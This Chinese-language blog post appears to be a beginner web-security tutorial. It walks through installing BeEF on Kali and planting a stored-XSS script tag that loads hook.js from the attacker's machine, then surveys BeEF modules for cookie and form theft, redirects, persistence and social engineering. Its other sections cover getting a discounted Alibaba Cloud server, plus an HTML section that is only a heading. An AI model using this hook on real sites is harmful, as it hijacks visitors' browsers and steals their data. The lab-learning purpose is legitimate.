欢迎光临
我们一直在努力

Web 安全入门三件套:BeEF XSS 攻击测试 + 白嫖阿里云服务器 + HTML 基础

1.   beef 上线 xss

运行命令:

apt-get install beef-xss

apt-get update

apt-get install beef-xss

apt-get install beef-xss—fix-missing

beef-xss

首次登入要修改密码

输入账号密码,初始账号为 beef

kali 访问:http://127.0.0.1:3000/ui/authentication

开小皮,在存储型 xss 写入:

<script src="http://kali 的 ip:3000/hook.js"></script>

只要访问到了这个留言页面,就可以在 kali 上线

绿色对目标主机生效并且不可见(不会被发现)

橙色对目标主机生效但可能可见(可能被发现)

灰色对目标主机来未必生效(可验证下)红色对目标主机不生效

比如弹个窗,点那个 execute

Browser:主要是针对浏览器的一些信息收集或攻击,其下的子选项卡 Hooked Domain主要是获取 HTTP 属性值,比如 cookie、表单值等,还可以做写简单的浏览器操作,

比如替换 href 值,弹出警告框, 重定向浏览器等。这个选项卡下的有些模块会根据受害者的浏览器来决定是否显示。主要是浏览器通用操作和其他基本信息检测。

Chrome extensions:主要是针对谷歌浏览器扩展插件

Debug:调试功能

Exploits:漏洞利用,主要利用一些已公开的漏洞进行攻击测试

Host:针对主机, 比如检测主机的浏览器、系统信息、 IP 地址、安装软件等等

IPEC:协议间通信。主要是用来连接、控制受害者浏览器的

Metasploit:Beef 可通过配置和 metasploit 平台联合,一旦有受害者出现,可通过信息

收集确定是否存在漏洞,进一步方便 metasploit 攻击测试Misc:杂项。

Network:网络扫描

Persistence:维护受害者访问

Phonegap:手机测试

Social engineering:社会工程学攻击

2.网站服务器白嫖搭建

阿里云,先认证学生身份,然后领取一个 300 优惠券,用这个券开服务器

系统选择 windows server 系列,主要是看个人需求,我选 2022

下个小皮,搭建网站跟在小皮上搭本地流程一样

最好是备案,需要工信部和公安双备案

3.html 基础

赞(0)
未经允许不得转载:171主机测评 » Web 安全入门三件套:BeEF XSS 攻击测试 + 白嫖阿里云服务器 + HTML 基础
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址